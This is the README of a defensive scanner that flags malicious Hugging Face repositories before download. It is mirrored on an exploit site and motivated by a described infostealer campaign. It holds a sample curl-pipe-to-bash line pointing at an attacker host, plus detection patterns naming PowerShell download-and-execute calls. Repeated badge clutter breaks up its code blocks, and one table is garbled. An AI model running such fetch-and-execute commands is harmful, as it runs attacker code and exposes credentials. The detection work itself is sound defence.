Share
## https://sploitus.com/exploit?id=AE42F09E-CF8A-5D39-8E20-0DA486FE5B13
# hf-model-provenance-scanner

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


> **Scan any Hugging Face repository for malicious signals _before_ the model is ever loaded.**  
> Zero runtime dependencies. Stdlib only. Works offline.

---

## The Attack That Prompted This Tool

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


**May 14, 2026 โ€” 06:00 UTC.**  A repository called `Open-OSS/privacy-filter` appeared on Hugging Face.  By midnight it had reached **#1 trending** with **244,000 downloads in 18 hours**.

The attack chain was three stages:

```
loader.py  โ†’  PowerShell download cradle  โ†’  Rust infostealer
```

1. The README told users to run `python loader.py`.
2. `loader.py` fetched a PowerShell script from a CDN.
3. The PowerShell script compiled and executed a Rust binary that exfiltrated SSH keys, AWS credentials, and browser cookies.

The repo was removed at 00:18 UTC the next day. By then it was too late for 244,000 pull operations.

**No existing tool would have caught this before a download.**

- **Garak** tests a loaded model's outputs โ€” useless if you never wanted to load it.
- **ModelScan** detects pickle exploits _inside_ weight files โ€” it can't flag loader.py or a missing SBOM.
- **Vigil / Rebuff** protect LLM _inputs_ at runtime โ€” a completely different threat surface.

`hf-model-provenance-scanner` runs _before_ any file is downloaded and detects the metadata and structural signals of this class of attack.

---

## Quick Start

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


### As a library

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```python
from hf_scanner.scanner import scan

# Populate from your own HF API call, a CI pipeline, or manual review.

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

repo_metadata = {
    "repo_id": "Open-OSS/privacy-filter",
    "author": "Open-OSS",
    "files": ["loader.py", "config.json", "README.md"],
    "readme": "Run: curl https://release.open-oss.io/setup.sh | bash",
    "downloads_24h": 244_000,
    "created_at": "2026-05-14T00:00:00Z",
    "author_repo_count": 0,
    "likes": 12,
}

result = scan(repo_metadata)
print(result.risk_level)       # 'CRITICAL'

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

print(result.recommendation)   # 'BLOCK'

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

print(result.risk_score)       # e.g. 95

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


for finding in result.findings:
    print(f"[{finding.severity}] {finding.title}")
```

### As a CLI

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```bash
pip install hf-model-provenance-scanner

# From a JSON metadata file

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

hf-scan --meta repo_meta.json

# Pipe JSON from stdin

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0}' \
  | hf-scan

# Machine-readable JSON output

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

hf-scan --meta repo_meta.json --format json

# Exit codes:  0 = ALLOW,  1 = REVIEW,  3 = BLOCK

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

```

---

## Sample Terminal Output

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
 HF Model Provenance Scanner
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  Repo   : Open-OSS/privacy-filter
  Scanned: 2026-05-14T06:32:11+00:00

  Risk Score  : [โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘] 89/100
  Risk Level  : CRITICAL

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  ๐Ÿšซ  BLOCK  โ€” DO NOT LOAD THIS MODEL  โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  Findings (7 total):
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
   1. [CRITICAL ] Known malicious loader script: 'loader.py'
        Check   : code_execution
        Desc    : The file 'loader.py' has a name associated with malware
                  delivery loaders. The May 2026 attack used this filename.
        Evidence: file='loader.py'

   2. [CRITICAL ] curl-pipe-to-shell pattern detected
        Check   : code_execution
        Desc    : The README/model card contains an instruction that would
                  execute remote code on the user's machine.
        Evidence: snippet='curl https://release.open-oss.io/setup.sh | bash'

   3. [HIGH     ] Suspicious download velocity: 244,000 in 24 h
        Check   : metadata_trust
        Desc    : The repo received 244,000 downloads in its first 24 hours.
        Evidence: downloads_24h=244000, threshold=10000

   4. [HIGH     ] Very new repository: 0.3 days old
        Check   : metadata_trust
        Desc    : Repos younger than 7 days have no track record.
        Evidence: created_at='2026-05-14T00:00:00Z', age_days=0.3

   5. [MEDIUM   ] Author 'Open-OSS' has no other public repositories
        Check   : metadata_trust
        Evidence: author='Open-OSS', author_repo_count=0

   6. [MEDIUM   ] No trust artifacts (model card, SBOM, provenance)
        Check   : sbom_check
        Evidence: model_card=False, sbom=False, provenance=False

   7. [MEDIUM   ] Repository has no model weights but contains scripts
        Check   : pickle_exploit
        Evidence: script_files=['loader.py']

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
```

---

## Checks Reference

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


### 1. `org_impersonation` โ€” Brand impersonation detection

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| What it detects | Why it matters |
|---|---|
| Author username within edit-distance โ‰ค 2 of a known-safe org | `0penai`, `micros0ft`, `meta_llama` fool humans at a glance |
| Verbatim boilerplate from a real org's model card | Attacker copies real marketing text to appear legitimate |

**Known-safe orgs:** `openai`, `meta-llama`, `google`, `microsoft`, `anthropic`, `mistralai`, `huggingface`, `stability-ai`, `cohere`, and more.

**Severity:** CRITICAL for any match.

---

### 2. `pickle_exploit` โ€” Unsafe serialisation detection

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| What it detects | Why it matters |
|---|---|
| `.pkl`, `.pt`, `.bin`, `.pth` files without `.safetensors` alternative | `torch.load()` on a pickle file = arbitrary code execution |
| `pickle.load()` / `torch.load()` / `np.load(allow_pickle=True)` in README | Instructs users to use the dangerous path |
| No model weights but scripts present | Delivery mechanism, not a real model |

**Severity:** HIGH for pickle-without-safetensors; INFO if safetensors is also present.

---

### 3. `code_execution` โ€” Executable script detection

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| File / pattern | Severity |
|---|---|
| `loader.py`, `downloader.py`, `dropper.py`, `stager.py` | CRITICAL |
| `*.ps1`, `*.bat`, `*.cmd`, `*.vbs` | CRITICAL |
| `curl โ€ฆ \| bash`, `wget โ€ฆ \| sh` in README | CRITICAL |
| `IEX`, `Invoke-Expression`, `DownloadString` in README | CRITICAL |
| `install.sh`, `run.sh`, `*.exe`, `*.elf` | HIGH |
| `subprocess.run()`, `os.system()` in README | HIGH |
| `setup.py`, `Makefile` | MEDIUM |

---

### 4. `metadata_trust` โ€” Account and velocity signals

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| Signal | Threshold | Severity |
|---|---|---|
| Repo age |  10,000 in 24 h | HIGH |
| Author repo count | 0 other repos | MEDIUM |
| Like/download ratio |  50 (purchased likes) | LOW |

---

### 5. `sbom_check` โ€” Provenance artifact checks

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| Artifact | Severity if missing |
|---|---|
| Model card (`README.md` with `model-index` YAML) | LOW |
| SBOM (`sbom.json`, `sbom.spdx`, `cyclonedx.json`) | INFO |
| Provenance (`provenance.json`, `attestation.json`) | INFO |
| All three missing together | MEDIUM (escalated) |

---

### 6. `supply_chain` โ€” Dependency analysis

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| Pattern | Severity |
|---|---|
| `--index-url` pointing away from PyPI | HIGH |
| Direct wheel/tarball URL installs | HIGH |
| Known typo-squatted package names | HIGH |
| `git+https://` dependencies | MEDIUM |
| `--extra-index-url` non-PyPI | MEDIUM |
| > 3 unpinned dependencies | LOW |

---

## Risk Scoring Formula

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


The 0โ€“100 risk score uses **diminishing returns** so that one CRITICAL finding doesn't max out the score, but two or more CRITICAL findings definitely do.

```
score = min(100, ฮฃ  severity_weight(i) ร— 1 / (1 + 0.15 ร— same_severity_count(i)))
```

Severity weights:

| Severity | Base weight |
|---|---|
| CRITICAL | 55 |
| HIGH | 35 |
| MEDIUM | 18 |
| LOW | 8 |
| INFO | 2 |

Score โ†’ risk level โ†’ recommendation:

| Score | Risk Level | Recommendation |
|---|---|---|
| 0 | SAFE | ALLOW |
| 1โ€“15 | LOW | ALLOW |
| 16โ€“35 | MEDIUM | REVIEW |
| 36โ€“60 | HIGH | REVIEW |
| 61โ€“100 | CRITICAL | BLOCK |

**Hard override:** Any CRITICAL-severity finding forces `recommendation = BLOCK`, regardless of score.

---

## `repo_metadata` Schema

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```python
{
    # Required

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "repo_id":            str,   # "author/model-name"

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


    # Strongly recommended

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "author":             str,   # HF username or org slug

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "files":              list[str],  # filenames in the repo root

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "readme":             str,   # raw README.md content

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "created_at":         str,   # ISO-8601 UTC  "2026-05-14T00:00:00Z"

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "author_repo_count":  int,   # how many repos the author has

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "downloads_24h":      int,   # downloads in first 24 hours

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "downloads_last_month": int,
    "likes":              int,

    # Optional

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "requirements":       str,   # raw requirements.txt content

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

    "tags":               list[str],
    "last_modified":      str,   # ISO-8601 UTC

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

}
```

All keys are optional. Missing keys are treated conservatively (worst-case assumption for trust signals).

---

## What No Other Tool Does

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


| Tool | What it does | What it misses |
|---|---|---|
| **Garak** | Red-teams a *loaded* model's output safety | Can't run before you download |
| **ModelScan** | Scans pickle bytecode inside weight files | Requires the file to be present; misses loader.py, missing SBOM |
| **Vigil / Rebuff** | Detects prompt injection at *runtime* | Completely different threat surface |
| **PurpleLlama** | Model output safety benchmarks | Post-load evaluation only |
| **Agentic Radar** | Scans agentic workflow code | Not focused on model provenance |
| **hf-model-provenance-scanner** | **Pre-download supply-chain audit** | _This is the gap_ |

The core insight: **the May 2026 attack was detectable from metadata alone**, without downloading a single byte. `loader.py` + 244K downloads in 24h + zero-repo account + no model card = BLOCK. No existing tool made this call.

---

## Installation

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```bash
# From PyPI (once published)

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

pip install hf-model-provenance-scanner

# From source

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

git clone https://github.com/example/hf-model-provenance-scanner
cd hf-model-provenance-scanner
pip install -e ".[dev]"
```

**Requirements:** Python โ‰ฅ 3.11. Zero runtime dependencies.

---

## Development

